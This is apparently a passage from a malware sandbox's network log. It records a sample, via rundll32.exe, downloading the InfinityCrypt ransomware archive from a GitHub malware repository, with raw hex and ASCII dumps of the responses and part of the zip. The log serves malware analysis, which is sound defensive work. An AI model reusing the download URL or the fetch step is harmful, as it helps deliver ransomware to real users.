                                                                                                                                                2022-09-29 12:48:34 UTC1255INData Raw: 94 c1 63 83 fb f9 d3 cf a4 65 23 43 69 96 9c da 3a 99 86 6d 99 c7 cb a9 17 e6 de d3 54 92 a2 c8 6a 01 83 1b ad 92 e0 b2 50 04 01 53 ea f7 72 2c 9b 97 c8 64 75 ab 11 ed a0 1a ad 68 7a 5a 7c bf 73 e6 b1 29 98 90 0d e8 b6 16 c4 b0 d4 0b aa c2 11 d5 40 2b 83 a0 c0 59 0c 80 fb 5d fd 95 f0 06 a5 c1 cf 7d f2 89 41 6a 23 8c a4 d8 65 f9 a5 bd 42 30 9a 8b 0d d3 40 68 7b 39 06 7f 73 34 1a 06 94 5b 94 f8 54 82 73 da 45 44 07 df c9 6e 90 e0 6d 7f db 0e 7d bf 5f 3b 16 73 7d 56 7c 4c 1e 17 7d 39 91 2e a0 3d d6 7e 56 80 ae 5c 9c bf e9 c0 5d 23 27 73 26 13 55 0d d4 47 70 a0 53 6a 56 4e 33 15 de c3 05 9b 1d e9 e2 f5 b4 f2 43 7d 02 f9 e5 2e bb 87 cd 07 d5 d8 ec a2 66 ef e6 d3 f7 b9 2d d2 66 f3 a3 96 da 9e 0f 52 66 f9 8d 34 f5 64 50 de e1 8e 89 20 db 18 2a a0 b9 88 a6 0a 8b
                                                                                                                                                Data Ascii: ce#Ci:mTjPSr,duhzZ|s)@+Y]}Aj#eB0@h{9s4[TsEDnm}_;s}V|L}9.=~V\]#'s&UGpSjVN3C}.f-fRf4dP *
                                                                                                                                                2022-09-29 12:48:34 UTC1271INData Raw: de 78 4f 34 66 84 10 8c 55 54 70 cd 51 f7 0a 15 61 b3 9a ec 33 d6 78 ab 8a 84 b1 4a f1 aa f0 ff b7 f7 7d 8a 0e 4c f2 1d bc b6 65 90 c8 49 e4 56 16 a3 5a be 9f 94 af 83 04 5d 17 c3 75 8b f1 80 be d7 54 b1 52 ce 25 bb fa 50 09 43 fa 3d 92 da 51 3f e4 73 1a ea 9c 04 04 3f c1 30 33 fe a0 54 9d 80 84 60 6a bc 79 3f 48 0b 1f ea ee 1e 5b 33 c3 45 44 1e 44 88 3a 4c f0 08 e3 68 f4 c6 f3 04 56 bb a9 c0 09 ec 1f f3 99 79 95 d7 b6 d1 59 cf 33 85 ef 6f a4 e4 59 a9 92 20 0b 48 89 29 3c e3 22 98 64 c4 6c dd d2 00 61 9c ea 2d 3c 4d f1 e1 1c 62 9e f1 f6 5c c0 dc 96 fd 0e a2 62 5f 24 a5 27 1d 77 61 1b be 35 7b 87 af 89 87 9d 9f 9e 88 16 28 ea 16 0d 46 1e 93 4f 37 18 71 e4 89 44 bc 54 6b 19 89 5c e0 60 8c 1f 84 6e 10 fb dc b9 3f 2c fb 3f 5e 6b b2 6a bb 19 2a 15 05 31 e1 09
                                                                                                                                                Data Ascii: xO4fUTpQa3xJ}LeIVZ]uTR%PC=Q?s?03T`jy?H[3EDD:LhVyY3oY H)<"dla-<Mb\b_$'wa5{(FO7qDTk\`n?,?^kj*1
                                                                                                                                                2022-09-29 12:48:34 UTC1287INData Raw: d3 4f 63 45 f9 2c b4 e8 d8 0f 1e b4 de 01 9b 79 85 d3 64 ab 1c a5 65 57 1e d6 11 d5 ac d6 51 c5 74 8a 1d 13 47 0f 44 db 7f fd f4 b1 23 d8 5a af 6c 69 59 2c e9 81 d2 f9 ad eb 49 d4 5a 59 24 71 53 fc 11 0e f6 5b a7 3d f2 5e 0f 9e 4c c1 a9 99 d9 61 33 8b c7 ba c7 14 7b ea 7c 08 0d d1 26 67 28 1d dd d8 e8 56 7f 02 7f b2 38 ac 30 73 73 13 d5 18 80 e8 bb a6 eb 48 6d c1 22 77 67 4c 7c a7 47 6e 40 b1 1c 44 4b 20 d5 02 c6 5e c5 bb 1b fe 1c 2d f9 09 ea d1 9a 69 05 ed 25 83 5b 23 54 16 d1 15 48 27 d9 d1 11 fa 1c 3b 9b 44 0a 93 38 1f 83 77 1d fc 35 7f b9 67 ba bf 58 ec 3e 9f b5 c1 cd fb 8d d0 d8 66 0e cf a4 d7 af 69 c9 ef ef 56 8a 90 a3 cf f1 98 5f b1 e4 1c 02 fd cc fd ee 57 63 52 56 f8 68 1b 75 2c 18 ab 77 e7 db fd 02 6b cf 3f ba 5e 4a 43 7a 75 70 43 8a d2 cd b2 97
                                                                                                                                                Data Ascii: OcE,ydeWQtGD#ZliY,IZY$qS[=^La3{|&g(V80ssHm"wgL|Gn@DK ^-i%[#TH';D8w5gX>fiV_WcRVhu,wk?^JCzupC


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                24192.168.2.349695140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:36 UTC1294OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                25140.82.121.4443192.168.2.349695C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:37 UTC1294INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:36 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:37 UTC1294INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                26192.168.2.349696185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:37 UTC1296OUTGET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                27185.199.108.133443192.168.2.349696C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:37 UTC1296INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 34300
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:37 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6949-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 6
                                                                                                                                                X-Timer: S1664455717.112770,VS0,VE0
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 6ed7cc8863dcc056e86b34088eaf453d0b3f99db
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:37 GMT
                                                                                                                                                Source-Age: 249
                                                                                                                                                2022-09-29 12:48:37 UTC1297INData Raw: 50 4b 03 04 14 00 01 00 08 00 05 80 55 4d 73 32 bc 1b 3e 85 00 00 00 4c 03 00 1c 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 66 69 6e 69 74 79 43 72 79 70 74 2e 65 78 65 82 87 5a 39 90 6f 1d 4b 56 8c 6f a5 78 75 67 df b9 5d 1b e7 c8 de 51 7e 50 59 e3 51 55 6b 55 48 f4 fd 3a ce 54 5a 2e e4 e9 b5 45 cd 28 59 f7 4e ba 07 6e e5 b7 9f ae bb 8e 1b b9 29 ca 82 bd 23 6d 87 ef ce 14 40 b3 aa 88 93 6c cd 38 c9 6b 8f f5 5c 89 57 2c 56 38 77 b2 d9 b4 13 71 55 9c a0 8f ea 4e e3 7c 56 be 4e 74 51 2a e5 23 32 c4 59 6f 50 84 15 53 3b c3 7d 7c 29 80 9c 4e c8 31 f9 27 3f f8 1d 7f 92 10 30 65 9c 61 49 18 4d af bb 52 c4 c6 5a 72 01 0d 3d 7d 39 80 54 2b cd c4 d2 9f b3 f0 40 5d 9b e5 dc ab 59 bb d8 29 21 91 f7 7a 11 f3 62 7b 82 05 97 bb ef f9 6b 35 d2 43 eb 1d 57 43 55 0a
                                                                                                                                                Data Ascii: PKUMs2>LEndermanch@InfinityCrypt.exeZ9oKVoxug]Q~PYQUkUH:TZ.E(YNn)#m@l8k\W,V8wqUN|VNtQ*#2YoPS;}|)N1'?0eaIMRZr=}9T+@]Y)!zb{k5CWCU
                                                                                                                                                2022-09-29 12:48:37 UTC1298INData Raw: 31 84 61 77 b6 e3 c9 b2 da 75 c6 fa 65 a5 e9 aa c3 75 e8 3a d7 90 b5 dc 6a 53 45 eb ed 0a b9 1d 24 b2 c1 7e da 22 8a 62 db 0d 02 2b 2f b4 18 81 e8 f4 15 82 a8 a1 41 3a 78 e0 bc a2 3c 90 67 40 1e 1d ff 73 6c ba 96 e0 67 29 52 b9 ad 8d fc ac 7e 00 ef a4 77 2c 98 34 4d 13 52 e1 41 b0 97 2c 53 fd 4c 71 46 9e 56 50 70 47 69 7c ed 5c a5 40 f9 4b e8 93 5e 7a 82 39 df e2 48 d8 e2 76 12 79 b6 92 03 be e3 af bf fc 58 d5 ed 38 bf 0a 7d f1 8b 9b eb c2 95 a7 44 af 7a e1 a2 e0 16 93 90 6e 04 81 f0 74 7f 3d 12 5c b6 40 90 ac fa 1a 85 fc 53 33 0f 75 b1 9b 22 d8 0a 1d c4 03 cd e2 db cb 30 cc d2 98 b6 8e 49 fe b3 f8 08 bc cb 18 60 6d 04 a0 b2 f1 3f 66 77 0f b2 18 86 ea 48 b8 69 da 1c 96 e1 85 7e 6b 92 6f 29 c0 4e 78 ae f2 8b cd 7b 83 02 2a 8b dd 97 64 9e c2 0b c7 ea 92 de
                                                                                                                                                Data Ascii: 1awueu:jSE$~"b+/A:x<g@slg)R~w,4MRA,SLqFVPpGi|\@K^z9HvyX8}Dznt=\@S3u"0I`m?fwHi~ko)Nx{*d
                                                                                                                                                2022-09-29 12:48:37 UTC1300INData Raw: 67 ff 25 ef e2 d5 38 39 2a 01 18 c5 98 77 49 c4 f5 60 e4 74 53 1b 7a a3 ae 31 94 71 cf e6 3b a7 df fd af 55 0c c5 2e 29 fe d7 0c 03 b0 4f ba b1 7d eb 34 fc ef 2c 74 15 98 88 eb 79 53 4e e3 e2 01 da 5a a2 24 2f e6 62 c9 1d 4f e7 7e 8a e8 e2 bb aa 3d 4f 40 b2 1c 2b 83 ac 7a f1 cf c6 c6 67 50 80 02 9e d9 04 7e 31 4f 3a 77 16 a3 3c 54 7e 34 cf 67 de dc 30 7e 1c 7f ee 45 d3 87 33 d5 ea cd 9f 13 25 1f 4c 65 4f a7 a0 ab 9e 4a 7c 73 41 49 cb 6c e5 34 10 09 58 bc cf d6 85 a3 ba ad f2 7e 58 1d 28 5b e0 40 e7 7a 10 3a 65 06 2f db 29 b3 8d d7 b2 af 82 b4 8b e8 fe 33 19 85 7c 3c 31 af bb 23 36 05 23 0b 98 0e 10 24 3e a3 a2 7f 3b 5d bc 56 17 39 ff c1 4c e9 98 de a9 ab df e2 a9 8b b3 33 4b 7c 32 29 01 0d 02 1e 20 fb 0a 2e 6e 8c 75 b1 c0 62 cf b9 d3 53 57 3a d6 9b 7d c1
                                                                                                                                                Data Ascii: g%89*wI`tSz1q;U.)O}4,tySNZ$/bO~=O@+zgP~1O:w<T~4g0~E3%LeOJ|sAIl4X~X([@z:e/)3|<1#6#$>;]V9L3K|2) .nubSW:}
                                                                                                                                                2022-09-29 12:48:37 UTC1301INData Raw: ec 70 20 ea c0 12 5f e1 f2 c0 af 3d f3 05 8f ef 69 21 e1 cf d1 7c 18 9b d4 f8 03 a2 23 df 57 95 9d 45 f9 e6 e8 f2 95 b9 2b 9a ed a4 b4 5e c8 04 94 00 d8 7c cc 0a 86 42 b4 15 1f df 8a 33 65 b1 7c 84 d9 77 b2 19 9b ca 06 46 97 30 55 4a 43 97 83 47 c9 5e 5c b5 7d af a7 c3 5f d9 ee 2c 4c b0 90 f6 d5 08 8e a3 c0 6f da 0d 7a 2e 02 db 93 57 2f d2 12 3f 45 b8 29 8c 58 fa f6 08 ef 92 03 51 52 7a 9b 73 e4 3c 5b 23 80 59 19 46 9e f5 40 96 e4 09 c8 02 cb 5f 15 f6 13 10 b8 76 85 79 f0 1d 9e ba 47 1f 31 a4 8e 20 a4 98 63 41 57 be 52 e8 74 5e 7a 7f d7 0d 9e b0 a5 f6 06 41 52 81 a8 ce 9c ea 70 f4 1a 20 ed d2 88 01 4d 9a aa c6 c4 69 d9 09 a6 45 ae 37 a2 24 76 19 dd 24 45 f1 c6 3f c1 ca 75 59 73 11 59 e1 56 e4 d0 1c cc 43 65 c4 17 d7 d4 c7 49 48 f8 69 ee 1e 25 4e 96 83 72
                                                                                                                                                Data Ascii: p _=i!|#WE+^|B3e|wF0UJCG^\}_,Loz.W/?E)XQRzs<[#YF@_vyG1 cAWRt^zARp MiE7$v$E?uYsYVCeIHi%Nr
                                                                                                                                                2022-09-29 12:48:37 UTC1302INData Raw: 55 fd 69 fe bf 20 83 be 4c a5 aa a7 62 29 fc 69 41 a5 d2 b9 e4 d0 08 3c 2d 1a 3b 02 73 39 88 c1 ae e1 29 95 97 42 09 84 6f 0d 06 11 24 82 ac 12 d3 39 3e 18 59 95 1e 30 ab 33 95 c1 15 65 c2 33 1e 3f 67 69 4b b2 19 db 58 09 42 81 2d 49 2c b7 8d 04 4d 32 c0 81 5e 66 81 f2 5b 1b 1b d4 f4 ed 87 60 9c a2 1d b3 1b 76 9b 42 6b c3 33 e7 b2 77 89 18 37 9b 7e 91 33 44 f6 a3 59 10 ce 66 79 14 ed 58 fb aa 46 45 fb 97 61 ca d6 0b 95 8b 06 b1 d6 3e 21 33 3b 82 28 a4 c1 95 f7 72 97 29 22 bf ed 9e 2a 4a 48 c1 e4 96 54 4a 23 a1 bd f9 39 de a1 8c 0f e2 62 f5 d3 fa 30 9e ba 36 c5 ea 3a a6 b1 5b 6b b4 5e 5a 0e 56 77 e7 e6 40 4f 81 63 f0 7b bb 8e a3 83 49 fe b5 d9 4d 2b 23 71 96 3a 02 4a d4 bc b1 85 a5 be b4 48 ed df 14 d5 c3 09 a9 51 3d f0 0b c8 49 e2 a3 db 81 a0 8e 7f 7c 52
                                                                                                                                                Data Ascii: Ui Lb)iA<-;s9)Bo$9>Y03e3?giKXB-I,M2^f[`vBk3w7~3DYfyXFEa>!3;(r)"*JHTJ#9b06:[k^ZVw@Oc{IM+#q:JHQ=I|R
                                                                                                                                                2022-09-29 12:48:37 UTC1304INData Raw: ee 93 ef cd 2b 61 96 54 02 33 f2 11 0b 65 07 c6 fd f2 43 3b 33 e3 4d 54 09 ee 54 d8 03 0e 2e 8e 89 0d 31 73 1a dc c9 d7 ab 7e 8d 8b 13 50 bc fc 49 cd 0d fe 20 5d e9 53 6b 8a e6 03 0a 5e b8 7f 01 aa 40 28 20 88 ce 05 85 8d 7d e9 78 74 f3 c7 c1 44 b9 60 b1 f0 bf 45 49 e9 33 3c 9d ab 65 cf 1e 73 84 9a d1 27 4e 3a 43 bb 46 1b c0 28 8e bb c6 b9 eb e0 e9 23 9a 39 82 f1 f3 1c e1 85 c0 3a e5 97 2e c2 69 af a2 b7 d2 05 09 7b 19 f3 29 46 5c d8 39 58 33 dc f4 dc ca 26 4f 88 93 fc fd 45 2c 01 10 ee a8 ae e6 5a c3 fc 06 19 96 38 0c 48 d1 b6 81 d4 81 0d e0 2b b5 53 98 55 5a e1 5a d9 87 af fb f8 51 98 3a 23 e1 75 70 91 a5 e8 62 27 97 d9 a9 2a 2b 75 62 50 80 4f 03 e7 f7 cf 53 d7 cf 7c f0 50 29 15 f1 44 c3 77 70 9d de af be 5e 2e 42 26 91 26 d6 60 fc 66 1b 3c b3 f7 e7 b1
                                                                                                                                                Data Ascii: +aT3eC;3MTT.1s~PI ]Sk^@( }xtD`EI3<es'N:CF(#9:.i{)F\9X3&OE,Z8H+SUZZQ:#upb'*+ubPOS|P)Dwp^.B&&`f<
                                                                                                                                                2022-09-29 12:48:37 UTC1305INData Raw: 30 43 ab 6d ae 09 49 eb 61 71 a1 a4 db 5c af 23 ac d2 7b 6e 50 17 e0 14 8c 35 84 d3 d3 14 cb 0e e3 96 e2 36 fa cf fe 0f 9b e2 e9 30 2f 36 5b 8f f4 26 71 41 b5 00 4f 1c 0d 49 2d a9 b6 10 b0 33 45 22 49 7a 12 27 c1 b2 a9 c8 4c 6c a3 8f 55 49 65 f4 db a4 bb e4 06 d1 5c 20 76 ac 8d 47 d4 61 26 c8 49 98 2f 90 e1 e2 1d 93 30 6f 88 3d 1e 29 73 81 c1 e4 51 1f 73 fa 24 c6 9d e8 be 1b 3a df 04 ce 8d b4 95 d7 5d e4 75 6d 48 b3 23 ad 8f 2a 5e f9 93 d3 4e dd 03 5c 4f 12 fd 3f 44 bf 79 0d 27 50 a0 31 a0 ee bd 5f e0 e8 4b 5d 12 1a a1 f1 88 73 92 89 a3 20 96 5b 9c cb c2 9c 9b ca 04 6a a5 d4 fd a1 58 42 92 95 b1 dd ca d2 bf 54 ad ec 95 8c 89 28 0f 97 78 87 1d c4 c2 d0 48 12 21 7a 38 94 b3 88 7a ec 75 a9 d2 84 be f7 45 74 e3 4b 85 f1 a5 50 4c 9e c5 4c 0b 10 34 2a df 04 76
                                                                                                                                                Data Ascii: 0CmIaq\#{nP560/6[&qAOI-3E"Iz'LlUIe\ vGa&I/0o=)sQs$:]umH#*^N\O?Dy'P1_K]s [jXBT(xH!z8zuEtKPLL4*v
                                                                                                                                                2022-09-29 12:48:37 UTC1307INData Raw: 83 73 b0 d0 97 e9 d5 91 20 a8 75 5f 89 ca c0 3c cb cf ab 92 02 48 cc 93 79 f7 7f ef 9d 0d 51 27 36 c9 1e f2 fb 33 34 45 da 34 ee df 72 6f 9d 6c 81 f8 0b 6a 90 64 b0 11 9d 8d a8 e4 5e f2 06 b8 e0 99 d8 ae 1c 53 3b 02 f4 9f 25 08 e5 2e fa 21 f7 55 ca 85 2d db 15 7e f6 63 79 45 25 73 55 34 60 f0 7d b7 be cc 99 24 b2 44 43 4e 7e d8 5a ea f2 07 f0 3f 89 fd e5 41 79 3c 2f 45 96 11 d5 a8 30 2f 48 16 65 e7 f5 0c 2f 27 a2 22 c3 bf 40 1e 20 82 ae d4 d7 26 c5 8e 0f 3e e8 08 d6 96 5a 53 ec 6a 12 25 ba 09 a0 f6 59 40 d6 23 85 b8 67 54 c8 2b 72 32 bc 3f d1 45 16 f8 58 bd 17 45 f7 db df c2 44 3d 9c bd 6d 39 d0 87 29 e5 42 f4 46 09 91 94 91 e2 49 92 1b 80 a2 69 b0 ca 5d d2 3c c6 e3 e0 9e bf 99 e7 4b 70 87 3f 1b a5 bd 8b 2d 51 e6 3c c1 95 e5 0e 7e 71 d7 20 64 4d c6 f9 e8
                                                                                                                                                Data Ascii: s u_<HyQ'634E4roljd^S;%.!U-~cyE%sU4`}$DCN~Z?Ay</E0/He/'"@ &>ZSj%Y@#gT+r2?EXED=m9)BFIi]<Kp?-Q<~q dM
                                                                                                                                                2022-09-29 12:48:37 UTC1308INData Raw: db 99 4f 7c b3 82 0a 49 3b b5 da ea 1c a7 f8 15 b3 46 4d 0d 18 0f 55 02 6e d7 57 f2 b8 ff 2e 63 8d 8d ee 59 32 6c fb a4 85 2a 97 e3 54 d7 1f f9 42 0b a3 26 a5 1d 2f b5 b1 90 2e c5 64 61 41 21 04 06 dd c3 6a 07 2e 44 4c 33 89 06 db 94 ba 19 d2 af 6b f5 5a c6 b3 4c 7b e1 46 66 92 45 8a fb cc e6 32 5e f3 88 3b 93 cf 42 a0 bd b2 2d 38 4b 16 3f 05 ff 17 89 25 57 d1 0f 85 92 c8 cf 67 02 ce 83 ab 62 17 7e 00 24 15 4e 7a 45 6b 50 d1 e6 72 01 f0 68 00 14 fb 10 8b 26 d8 d5 5d 2f 7b 2c aa 54 c3 a7 6e cf 57 82 46 9e 44 c8 a6 52 31 0d f6 51 e4 25 1b fc 26 4c ed 91 fe 93 c3 ab d8 fd 87 48 ee a6 e6 fa c1 40 bd c6 a3 5f b9 c3 44 84 99 31 79 3a 50 fe ef 2c 8a 39 e3 be 00 63 02 08 41 07 b0 0f 3f 6b 00 12 07 55 4b 18 c1 46 ad 37 9a aa 72 b9 0f cc a2 6d 7f f7 ae 5b cd 1f 7a
                                                                                                                                                Data Ascii: O|I;FMUnW.cY2l*TB&/.daA!j.DL3kZL{FfE2^;B-8K?%Wgb~$NzEkPrh&]/{,TnWFDR1Q%&LH@_D1y:P,9cA?kUKF7rm[z
                                                                                                                                                2022-09-29 12:48:37 UTC1309INData Raw: 2a 3d 20 1c b5 5d cf 26 11 d1 0d 35 1b 93 f3 6e c9 7c 21 ef 65 8b 5e b4 8e e3 af 0c 71 1e f9 75 e7 57 43 f5 c6 6c 79 16 e1 0c b8 7f 3c 93 34 a1 55 be 19 26 2c 21 d9 27 62 7e 87 18 c2 a2 c9 cb 02 9a ab 99 9c b8 ed 23 ef d4 93 0a fd 7f 85 37 4c 4c 3b 8a 1e 48 5b d6 3b 07 a9 fa 21 b6 ff 59 d1 f9 86 2f e3 e7 d5 3b 03 ed 5b ea 21 59 8d f8 c7 ed e3 f5 7e a8 4a 22 b1 e9 5a 52 fb b0 15 f2 49 92 ee 3e 3a 39 59 33 54 80 d1 74 4d 86 e0 d3 13 5e a9 bd 68 93 5f 8f 91 65 5e 69 bd 4e eb 14 b8 37 0d ca 26 02 cf 88 31 cb 07 a8 54 69 b2 5b 4f 9a a0 fd f5 75 a2 fa cb e8 1b b6 11 8c 15 ca 02 7d 9c 3d 6f 99 7d d5 41 61 d7 a6 76 09 08 da 83 05 64 34 a9 b2 4f d7 e4 8f e7 df 99 2e b6 61 cb 63 a3 0f d3 88 d5 44 ef 29 15 49 44 de c3 68 4d db db 5f bd 70 a1 63 d7 f8 b7 57 f8 86 f7
                                                                                                                                                Data Ascii: *= ]&5n|!e^quWCly<4U&,!'b~#7LL;H[;!Y/;[!Y~J"ZRI>:9Y3TtM^h_e^iN7&1Ti[Ou}=o}Aavd4O.acD)IDhM_pcW
                                                                                                                                                2022-09-29 12:48:37 UTC1311INData Raw: db a5 a1 d2 dc ed 13 11 30 ca 6e f3 e0 6e 3a 16 87 a6 7b 8d d4 bc 3d f7 e6 d5 0f fa e8 0f dd 1e 82 da 76 42 98 c5 99 ed 46 87 3d ec c2 7a a0 d7 ed f8 35 a7 3c de 27 f6 54 fa 5f 55 c1 28 62 c0 c0 e8 a6 f4 05 5d 4f e1 0e ba 5b af 05 fe f2 ef c2 be 8f 42 76 9f 9b fd b2 32 cc 0f 7e 83 3a 60 c8 7b f6 b2 00 70 05 1b c4 cc b2 4b e9 13 64 c2 62 0d da f1 1b 85 ad 5f bc 77 94 ca bf 51 da e7 0e 69 ae 4c 73 e1 65 98 be 6a 11 b2 ab 1e e7 d8 29 8b 43 8f 94 e8 08 63 91 a2 96 37 62 b9 ab e1 e7 82 59 2d ed d6 90 f3 a9 39 36 ae e7 53 08 f2 23 1b 12 f1 a8 b3 1c 2d 5f 2e ab 05 9e fc ce 70 10 8f c0 c2 95 aa c8 76 0f d2 08 31 29 93 ee 4e fb 4f a2 12 e8 3d b3 82 ed 71 55 93 3f 0e 26 18 d1 69 5d 7a 30 ee a0 8f 07 9d 9e d3 9e 44 3f c2 49 88 87 58 f8 4e 7a fc 3c 02 25 4e 4c 40 63
                                                                                                                                                Data Ascii: 0nn:{=vBF=z5<'T_U(b]O[Bv2~:`{pKdb_wQiLsej)Cc7bY-96S#-_.pv1)NO=qU?&i]z0D?IXNz<%NL@c
                                                                                                                                                2022-09-29 12:48:37 UTC1312INData Raw: c2 fd 4b ab b8 f6 1e b3 d2 d6 2a 5c 2e 3e 2c 8a 31 59 2a 4d 1a 11 3b cf 84 48 02 6c 98 09 92 ed e6 1c 1b b5 52 98 89 4b 9e 59 e3 7f ac d7 44 18 70 7c db 52 c8 85 f7 d4 85 21 e7 55 ed 88 17 5c 7d 29 20 86 fc 64 da 87 d9 0c 92 93 2c ee 5f 60 8a 8c f6 72 bf de 22 26 fc f2 e7 4c e3 cb 46 15 3d ae f0 e7 78 3d 5e c0 2e d8 9c 40 54 c7 47 b9 c3 a2 f8 79 d1 98 98 ad b7 e4 b0 b8 28 b2 fe d3 97 f5 db c3 bd 64 b0 f2 d6 95 13 4a 4f 7c 17 ea 8c 3f 55 ff af 14 f0 46 b4 80 de 6e bb d4 3c 08 f5 4a 15 b8 ca 56 17 f5 c7 6a e0 0c 76 5d 1d 4a b4 0c 71 0f 10 2d db 8b d3 bf 36 b4 ef ac 29 cf 3f 45 69 89 30 e5 18 72 d5 8b e5 83 be fc 73 3b e3 15 45 e7 7b 18 8a 65 31 ed b6 53 5a cd c5 3b cd 41 73 99 2d 3d 7f 12 45 2f df 4c 24 d8 4f c8 30 d2 d1 67 27 2a 73 71 33 44 55 99 e2 ae be
                                                                                                                                                Data Ascii: K*\.>,1Y*M;HlRKYDp|R!U\}) d,_`r"&LF=x=^.@TGy(dJO|?UFn<JVjv]Jq-6)?Ei0rs;E{e1SZ;As-=E/L$O0g'*sq3DU
                                                                                                                                                2022-09-29 12:48:37 UTC1312INData Raw: f0 bc 3e 80 cd 10 4f 38 3c 5c 00 28 e6 7b 5a eb f0 8e b0 bb 58 f5 87 b4 fd 3d d8 41 59 0b df c3 79 fe 33 b8 e9 75 65 db 65 bc 89 ee 6d bc 15 24 13 b5 2b 44 ce b0 75 72 aa 99 44 23 7b e4 30 87 41 36 66 da 7b 6e c5 52 4e 99 61 df 03 41 de f8 55 55 80 a7 eb d7 19 f8 42 40 11 12 4d 4a a4 49 2d d8 b2 c6 83 5c d2 0b 1f 88 8c 4b 87 51 bb f9 57 23 07 32 e8 4b 55 24 7d a0 f9 5a 09 fd 6d c6 81 bd b7 28 ff 5e a3 8d 22 5a 93 94 e4 35 4e f5 21 6c e7 37 b6 07 f2 11 cc e7 43 c6 31 97 f8 3e f6 6c d2 78 a6 e6 0d 8c b2 3e 87 fb d3 bc e5 2a 45 c7 a7 83 09 f7 e2 6d 50 9b fa b2 37 fb bc 83 d0 b7 f2 f1 86 26 12 9b bc 84 03 87 dd fd 73 90 13 75 99 62 b7 00 e9 0d eb 11 41 b7 5d 7f fd d6 8d 95 55 b3 20 d0 2d f5 48 7f 62 cf b0 65 fb d5 6a d7 56 2d 27 54 ae 89 8d d4 f2 23 18 8b cf
                                                                                                                                                Data Ascii: >O8<\({ZX=AYy3ueem$+DurD#{0A6f{nRNaAUUB@MJI-\KQW#2KU$}Zm(^"Z5N!l7C1>lx>*EmP7&subA]U -HbejV-'T#
